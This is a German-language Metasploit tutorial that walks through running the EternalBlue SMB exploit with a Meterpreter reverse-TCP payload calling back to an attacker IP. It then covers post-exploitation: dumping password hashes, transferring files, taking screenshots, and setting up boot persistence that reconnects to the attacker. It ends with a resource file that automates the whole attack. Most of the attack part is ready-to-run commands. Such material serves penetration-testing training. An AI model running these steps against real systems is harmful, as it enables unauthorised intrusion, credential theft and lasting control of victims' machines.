Metasploit Framework
1. Starten der msfconsole
msfconsoleUm die Metasploit-Konsole zu starten, gibt man einfach den folgenden Befehl im Terminal ein:
$ msfconsoleDies lädt die Hauptschnittstelle von Metasploit. Nach dem Start erscheint eine Begrüßungsmeldung mit einer Eingabeaufforderung (msf >), an der du Befehle eingeben kannst.
2. Grundlagen der msfconsole
msfconsole2.1 Hilfe anzeigen
Um alle verfügbaren Befehle und deren Beschreibung anzuzeigen, kannst du den folgenden Befehl nutzen:
msf > helpDies zeigt eine Liste aller wichtigen Befehle der msfconsole an.
2.2 Module durchsuchen und verwenden
Metasploit enthält eine Vielzahl von Modulen, die in folgende Kategorien unterteilt sind:
Exploits: Code, der Schwachstellen auf dem Zielsystem ausnutzt.
Payloads: Der Code, der nach einem erfolgreichen Exploit auf dem Zielsystem ausgeführt wird.
Encoders: Techniken, um Payloads zu verschleiern und der Erkennung zu entgehen.
Auxiliary Modules: Module, die zusätzliche Funktionen bieten, wie z.B. Scans, Fingerprinting oder DOS-Attacken.
2.3 Module durchsuchen
Um nach einem bestimmten Modul zu suchen, kannst du den Befehl search verwenden. Zum Beispiel, um nach einem SMB-Exploit zu suchen:
msf > search smbDie Ausgabe zeigt dir eine Liste aller Module, die mit SMB zu tun haben, zusammen mit deren Rang, Name und Beschreibung.
2.4 Module verwenden
Nachdem du ein passendes Modul gefunden hast, wähle es mit dem Befehl use aus. Wenn du zum Beispiel den SMB-Exploit exploit/windows/smb/ms17_010_eternalblue verwenden möchtest, führst du folgenden Befehl aus:
msf > use exploit/windows/smb/ms17_010_eternalblueDie Eingabeaufforderung ändert sich dann auf das Modul:
msf exploit(ms17_010_eternalblue) >2.5 Informationen zu einem Modul anzeigen
Um Informationen über das ausgewählte Modul anzuzeigen, benutze den Befehl info:
msf exploit(ms17_010_eternalblue) > infoDieser Befehl zeigt dir eine detaillierte Beschreibung des Moduls, die benötigten Optionen und mögliche Payloads.
3. Konfiguration und Ausführung eines Exploits
3.1 Ziele und Optionen festlegen
Jedes Modul hat spezifische Optionen, die konfiguriert werden müssen, z.B. die Ziel-IP-Adresse oder den Port. Diese Optionen kannst du mit dem Befehl show options anzeigen:
msf exploit(ms17_010_eternalblue) > show optionsUm eine bestimmte Option zu setzen, benutzt du den Befehl set. Beispiel: Um die Ziel-IP-Adresse (RHOSTS) auf 192.168.1.10 zu setzen, gibst du folgenden Befehl ein:
msf exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.103.2 Payloads festlegen
Nachdem die Optionen konfiguriert sind, musst du einen Payload auswählen. Du kannst dir die verfügbaren Payloads anzeigen lassen:
msf exploit(ms17_010_eternalblue) > show payloadsWähle dann einen Payload aus. Zum Beispiel den Reverse-TCP-Payload:
msf exploit(ms17_010_eternalblue) > set PAYLOAD windows/meterpreter/reverse_tcpDu kannst den Payload ebenfalls konfigurieren, z.B. die IP-Adresse (LHOST) und den Port (LPORT), auf dem du auf die Verbindung wartest:
msf exploit(ms17_010_eternalblue) > set LHOST 192.168.1.5
msf exploit(ms17_010_eternalblue) > set LPORT 44443.3 Exploit ausführen
Nachdem alle Optionen und Payloads gesetzt sind, kannst du den Exploit mit folgendem Befehl starten:
msf exploit(ms17_010_eternalblue) > exploitAlternativ kannst du run verwenden, das denselben Effekt hat:
msf exploit(ms17_010_eternalblue) > runWenn der Exploit erfolgreich ist, erhältst du eine Verbindung zum Zielsystem, z.B. eine Meterpreter-Shell, die dir erlaubt, weitere Kommandos auf dem Zielsystem auszuführen.
4. Post-Exploitation mit Meterpreter
Wenn du erfolgreich eine Meterpreter-Shell erlangt hast, kannst du viele nützliche Befehle ausführen, um das Zielsystem zu kontrollieren.
4.1 Wichtige Meterpreter-Befehle
sysinfo: Zeigt Informationen über das Zielsystem an.
meterpreter > sysinfogetuid: Zeigt den Benutzer an, unter dem die Shell läuft.
meterpreter > getuidupload/download: Dateien auf das Zielsystem hoch- oder herunterladen.
meterpreter > upload /local/path /remote/path meterpreter > download /remote/path /local/pathshell: Öffnet eine normale Command-Shell auf dem Zielsystem.
meterpreter > shellscreenshot: Erstellt einen Screenshot des Zielsystems.
meterpreter > screenshothashdump: Extrahiert die Passwort-Hashes des Zielsystems (Windows).
meterpreter > hashdump
4.2 Persistence und Beibehaltung der Kontrolle
Um eine persistente Verbindung zum Zielsystem einzurichten, kannst du verschiedene Module verwenden, die Metasploit bietet. Zum Beispiel kannst du den Meterpreter-Command persistence nutzen, um bei jedem Neustart des Zielsystems eine Verbindung herzustellen.
msf > run persistence -U -i 5 -p 4444 -r 192.168.1.5-U: Startet beim Booten des Systems.-i 5: Versucht alle 5 Sekunden, eine Verbindung herzustellen.-p 4444: Verwendet den Port 4444.-r 192.168.1.5: Verbindet sich zurück zu der IP des Angreifers.
5. Nützliche Befehle und Tipps
5.1 Sessions verwalten
Manchmal hast du mehrere Sitzungen gleichzeitig offen. Mit dem Befehl sessions kannst du diese anzeigen und verwalten.
Alle Sitzungen anzeigen:
msf > sessions -lZu einer spezifischen Sitzung wechseln:
msf > sessions -i <session-id>
5.2 Jobs und Exploits im Hintergrund laufen lassen
Du kannst Exploits im Hintergrund laufen lassen, indem du exploit -j verwendest. Dies ist nützlich, wenn du mehrere Exploits parallel laufen lassen möchtest:
msf exploit(ms17_010_eternalblue) > exploit -j5.3 Automatisierung mit Resource Files
Du kannst eine Reihe von Befehlen in eine Datei schreiben und diese mit Metasploit ausführen lassen, um Arbeitsabläufe zu automatisieren. Zum Beispiel, um einen Scan oder Exploit-Angriff automatisch durchzuführen. Erstelle eine Datei, z.B. exploit.rc, und füge folgende Befehle hinzu:
msf > use exploit/windows/smb/ms17_010_eternalblue
msf > set RHOSTS 192.168.1.10
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.1.5
msf > set LPORT 4444
msf > exploitDann kannst du das Resource-File in msfconsole laden:
msf > resource /path/to/exploit.rcLast updated